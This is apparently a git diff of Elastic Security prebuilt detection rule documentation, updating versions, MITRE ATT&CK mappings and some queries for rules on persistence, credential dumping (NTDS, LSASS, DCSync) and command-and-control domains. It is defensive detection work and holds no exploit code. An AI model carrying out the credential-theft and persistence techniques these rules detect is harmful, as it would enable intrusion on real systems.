+66,7 @@ registry where host.os.type == "windows" and event.action != "deletion" and ** Name: Modify Registry ** ID: T1112 ** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/rule-details/new-activesyncalloweddeviceid-added-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/new-activesyncalloweddeviceid-added-via-powershell.asciidoc index 9600f1a2da..0349cca49b 100644 --- a/docs/detections/prebuilt-rules/rule-details/new-activesyncalloweddeviceid-added-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/new-activesyncalloweddeviceid-added-via-powershell.asciidoc @@ -33,10 +33,11 @@ Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a n * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -77,3 +78,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Additional Email Delegate Permissions ** ID: T1098.002 ** Reference URL: https://attack.mitre.org/techniques/T1098/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/new-systemd-service-created-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/new-systemd-service-created-by-previously-unknown-process.asciidoc index ca4d4dafa6..5e75dcc7bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/new-systemd-service-created-by-previously-unknown-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/new-systemd-service-created-by-previously-unknown-process.asciidoc @@ -35,7 +35,7 @@ Systemd service files are configuration files in Linux systems used to define an * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -49,11 +49,20 @@ Systemd service files are configuration files in Linux systems used to define an [source, js] ---------------------------------- -host.os.type : "linux" and event.action : ("creation" or "file_create_event") and -file.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or -/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not -(process.name : ("dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "dnf-automatic" or python* or - "elastic-agent" or "cinc-client") or file.extension : ("swp" or "swx")) +host.os.type:linux and event.category:file and event.action:("creation" or "file_create_event") and file.path:( + /etc/systemd/system/* or + /usr/local/lib/systemd/system/* or + /lib/systemd/system/* or + /usr/lib/systemd/system/* or + /home/*/.config/systemd/user/* +) and +not ( + process.name:( + "dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "dnf-automatic" or python* or "puppetd" or + "elastic-agent" or "cinc-client" or "chef-client" or "pacman" or "puppet" or "cloudflared" + ) or + file.extension:("swp" or "swpx") +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/new-systemd-timer-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/new-systemd-timer-created.asciidoc index cb64a87aa8..b38cecca42 100644 --- a/docs/detections/prebuilt-rules/rule-details/new-systemd-timer-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/new-systemd-timer-created.asciidoc @@ -35,7 +35,7 @@ Detects the creation of a systemd timer within any of the default systemd timer * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -108,6 +108,7 @@ This rule monitors the creation of new systemd timer files, potentially indicati - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -117,7 +118,9 @@ This rule monitors the creation of new systemd timer files, potentially indicati ---------------------------------- host.os.type : "linux" and event.action : ("creation" or "file_create_event") and file.extension : "timer" and file.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or -/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : ("docker" or "dockerd" or "dnf" or "yum" or "rpm" or "dpkg" or "executor") +/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : ( + "docker" or "dockerd" or "dnf" or "yum" or "rpm" or "dpkg" or "executor" or "cloudflared" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/nping-process-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/nping-process-activity.asciidoc index 2ab39128ca..2778a5aff7 100644 --- a/docs/detections/prebuilt-rules/rule-details/nping-process-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/nping-process-activity.asciidoc @@ -34,7 +34,7 @@ Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the abil * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/ntds-or-sam-database-file-copied.asciidoc b/docs/detections/prebuilt-rules/rule-details/ntds-or-sam-database-file-copied.asciidoc index 2902e3a7e6..aad8dc2327 100644 --- a/docs/detections/prebuilt-rules/rule-details/ntds-or-sam-database-file-copied.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/ntds-or-sam-database-file-copied.asciidoc @@ -37,7 +37,7 @@ Identifies a copy operation of the Active Directory Domain Database (ntds.dit) o * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -85,3 +85,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Security Account Manager ** ID: T1003.002 ** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/nullsessionpipe-registry-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/nullsessionpipe-registry-modification.asciidoc index 56ac2b61f2..e6dc11ca07 100644 --- a/docs/detections/prebuilt-rules/rule-details/nullsessionpipe-registry-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/nullsessionpipe-registry-modification.asciidoc @@ -31,10 +31,11 @@ Identifies NullSessionPipe registry modifications that specify which pipes can b * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -70,3 +71,11 @@ registry.path : ( ** Name: SMB/Windows Admin Shares ** ID: T1021.002 ** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/office-test-registry-persistence.asciidoc b/docs/detections/prebuilt-rules/rule-details/office-test-registry-persistence.asciidoc index dac7481f4f..7988f872f7 100644 --- a/docs/detections/prebuilt-rules/rule-details/office-test-registry-persistence.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/office-test-registry-persistence.asciidoc @@ -29,10 +29,11 @@ Identifies the modification of the Microsoft Office "Office Test" Registry key, * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -65,3 +66,11 @@ registry where host.os.type == "windows" and event.action != "deletion" and ** Name: Office Test ** ID: T1137.002 ** Reference URL: https://attack.mitre.org/techniques/T1137/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/okta-brute-force-or-password-spraying-attack.asciidoc b/docs/detections/prebuilt-rules/rule-details/okta-brute-force-or-password-spraying-attack.asciidoc index 3eda1d5551..c7e7c4750a 100644 --- a/docs/detections/prebuilt-rules/rule-details/okta-brute-force-or-password-spraying-attack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/okta-brute-force-or-password-spraying-attack.asciidoc @@ -32,7 +32,7 @@ Identifies a high number of failed Okta user authentication attempts from a sing * Tactic: Credential Access * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/okta-threatinsight-threat-suspected-promotion.asciidoc b/docs/detections/prebuilt-rules/rule-details/okta-threatinsight-threat-suspected-promotion.asciidoc index 91168f666c..9d6c4a4cc9 100644 --- a/docs/detections/prebuilt-rules/rule-details/okta-threatinsight-threat-suspected-promotion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/okta-threatinsight-threat-suspected-promotion.asciidoc @@ -32,7 +32,7 @@ Okta ThreatInsight is a feature that provides valuable debug data regarding auth * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/okta-user-session-impersonation.asciidoc b/docs/detections/prebuilt-rules/rule-details/okta-user-session-impersonation.asciidoc index c51463f4e2..160bb0288e 100644 --- a/docs/detections/prebuilt-rules/rule-details/okta-user-session-impersonation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/okta-user-session-impersonation.asciidoc @@ -31,7 +31,7 @@ A user has initiated a session impersonation granting them access to the environ * Tactic: Credential Access * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/outbound-scheduled-task-activity-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/outbound-scheduled-task-activity-via-powershell.asciidoc index 3ef825d22d..fd97683b7c 100644 --- a/docs/detections/prebuilt-rules/rule-details/outbound-scheduled-task-activity-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/outbound-scheduled-task-activity-via-powershell.asciidoc @@ -33,7 +33,7 @@ Identifies the PowerShell process loading the Task Scheduler COM DLL followed by * Tactic: Execution * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -68,3 +68,11 @@ sequence by host.id, process.entity_id with maxspan = 5s ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/parent-process-pid-spoofing.asciidoc b/docs/detections/prebuilt-rules/rule-details/parent-process-pid-spoofing.asciidoc index a0f7d87131..aa213c12fb 100644 --- a/docs/detections/prebuilt-rules/rule-details/parent-process-pid-spoofing.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/parent-process-pid-spoofing.asciidoc @@ -29,9 +29,10 @@ Identifies parent process spoofing used to thwart detection. Adversaries may spo * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -101,3 +102,15 @@ sequence by host.id, user.id with maxspan=3m ** Name: Parent PID Spoofing ** ID: T1134.004 ** Reference URL: https://attack.mitre.org/techniques/T1134/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ +* Sub-technique: +** Name: Parent PID Spoofing +** ID: T1134.004 +** Reference URL: https://attack.mitre.org/techniques/T1134/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-hidden-run-key-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-hidden-run-key-detected.asciidoc index 5cbe588f5d..ffea59cc8b 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-hidden-run-key-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-hidden-run-key-detected.asciidoc @@ -33,10 +33,12 @@ Identifies a persistence mechanism that utilizes the NtSetValueKey native API to * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -89,3 +91,19 @@ registry where host.os.type == "windows" and /* length(registry.data.strings) > ** Name: Registry Run Keys / Startup Folder ** ID: T1547.001 ** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc index 28a8c539c1..7c78fc03c4 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc @@ -36,7 +36,7 @@ Identifies the creation or modification of a K Desktop Environment (KDE) AutoSta * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -45,47 +45,6 @@ Identifies the creation or modification of a K Desktop Environment (KDE) AutoSta *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. -- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-microsoft-office-addins.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-microsoft-office-addins.asciidoc index b873031ab6..b40650ae29 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-microsoft-office-addins.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-microsoft-office-addins.asciidoc @@ -35,7 +35,7 @@ Detects attempts to establish persistence on an endpoint by abusing Microsoft Of * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -78,3 +78,7 @@ file where host.os.type == "windows" and event.type != "deletion" and ** Name: Office Application Startup ** ID: T1137 ** Reference URL: https://attack.mitre.org/techniques/T1137/ +* Sub-technique: +** Name: Add-ins +** ID: T1137.006 +** Reference URL: https://attack.mitre.org/techniques/T1137/006/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-powershell-profile.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-powershell-profile.asciidoc index 82ae257ad4..f034a6a2b2 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-powershell-profile.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-powershell-profile.asciidoc @@ -33,10 +33,11 @@ Identifies the creation or modification of a PowerShell profile. PowerShell prof * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -72,3 +73,15 @@ file where host.os.type == "windows" and event.type != "deletion" and ** Name: PowerShell Profile ** ID: T1546.013 ** Reference URL: https://attack.mitre.org/techniques/T1546/013/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: PowerShell Profile +** ID: T1546.013 +** Reference URL: https://attack.mitre.org/techniques/T1546/013/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc index d63e525474..20b3199c69 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc @@ -32,10 +32,11 @@ Detects the successful hijack of Microsoft Compatibility Appraiser scheduled tas * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -82,3 +83,23 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-update-orchestrator-service-hijack.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-update-orchestrator-service-hijack.asciidoc index e89d6185b5..520e25e7f9 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-update-orchestrator-service-hijack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-update-orchestrator-service-hijack.asciidoc @@ -32,12 +32,13 @@ Identifies potential hijacking of the Microsoft Update Orchestrator Service to e * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Use Case: Vulnerability * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -143,3 +144,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-wmi-event-subscription.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-wmi-event-subscription.asciidoc index 0f7985fbba..52c8d4c38e 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-wmi-event-subscription.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-wmi-event-subscription.asciidoc @@ -32,10 +32,11 @@ An adversary can use Windows Management Instrumentation (WMI) to install event f * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -78,3 +79,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Management Instrumentation Event Subscription ** ID: T1546.003 ** Reference URL: https://attack.mitre.org/techniques/T1546/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/port-forwarding-rule-addition.asciidoc b/docs/detections/prebuilt-rules/rule-details/port-forwarding-rule-addition.asciidoc index b094b361ee..0ff31682a6 100644 --- a/docs/detections/prebuilt-rules/rule-details/port-forwarding-rule-addition.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/port-forwarding-rule-addition.asciidoc @@ -32,11 +32,12 @@ Identifies the creation of a new port forwarding rule. An adversary may abuse th * OS: Windows * Use Case: Threat Detection * Tactic: Command and Control +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -114,3 +115,11 @@ registry where host.os.type == "windows" and registry.path : ( ** Name: Protocol Tunneling ** ID: T1572 ** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc b/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc index 77a925cc30..11dd48b088 100644 --- a/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc @@ -32,7 +32,7 @@ This rule detects a known command and control pattern in network events. The FIN * Tactic: Command and Control * Domain: Endpoint -*Version*: 103 +*Version*: 104 *Rule authors*: @@ -56,8 +56,8 @@ In the event this rule identifies benign domains in your environment, the `desti [source, js] ---------------------------------- -(event.dataset: (network_traffic.tls or network_traffic.http) or - (event.category: (network or network_traffic) and type: (tls or http) and network.transport: tcp)) and +(event.dataset: (network_traffic.tls OR network_traffic.http) or + (event.category: (network OR network_traffic) AND type: (tls OR http) AND network.transport: tcp)) AND destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destination.domain:zoom.us ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/possible-okta-dos-attack.asciidoc b/docs/detections/prebuilt-rules/rule-details/possible-okta-dos-attack.asciidoc index 873e7b77b0..79def4629f 100644 --- a/docs/detections/prebuilt-rules/rule-details/possible-okta-dos-attack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/possible-okta-dos-attack.asciidoc @@ -32,7 +32,7 @@ Detects possible Denial of Service (DoS) attacks against an Okta organization. A * Data Source: Okta * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-abuse-of-repeated-mfa-push-notifications.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-abuse-of-repeated-mfa-push-notifications.asciidoc index fae89442b0..be5500e2cf 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-abuse-of-repeated-mfa-push-notifications.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-abuse-of-repeated-mfa-push-notifications.asciidoc @@ -31,7 +31,7 @@ Detects when an attacker abuses the Multi-Factor authentication mechanism by rep * Tactic: Credential Access * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-code-execution-via-postgresql.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-code-execution-via-postgresql.asciidoc index 38afde074a..283f833c17 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-code-execution-via-postgresql.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-code-execution-via-postgresql.asciidoc @@ -31,7 +31,7 @@ This rule monitors for suspicious activities that may indicate an attacker attem * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-dcsync.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-dcsync.asciidoc index a7954cc74f..79fbbf2948 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-dcsync.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-dcsync.asciidoc @@ -36,11 +36,12 @@ This rule identifies when a User Account starts the Active Directory Replication * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Privilege Escalation * Data Source: Active Directory * Resources: Investigation Guide * Use Case: Active Directory Monitoring -*Version*: 109 +*Version*: 110 *Rule authors*: @@ -135,3 +136,15 @@ any where event.action == "Directory Service Access" and ** Name: DCSync ** ID: T1003.006 ** Reference URL: https://attack.mitre.org/techniques/T1003/006/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc index aefe7c74ba..8ec78fbaa6 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc @@ -31,9 +31,10 @@ Identifies suspicious access to LSASS handle from a call trace pointing to DBGHe * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic:Execution * Data Source: Sysmon Only -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -80,3 +81,11 @@ process where host.os.type == "windows" and event.code == "10" and ** Name: LSASS Memory ** ID: T1003.001 ** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc new file mode 100644 index 0000000000..baf367fdff --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc @@ -0,0 +1,102 @@ +[[potential-credential-access-via-memory-dump-file-creation]] +=== Potential Credential Access via Memory Dump File Creation + +Identifies the creation or modification of a medium size memory dump file which can indicate an attempt to access credentials from a process memory. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + 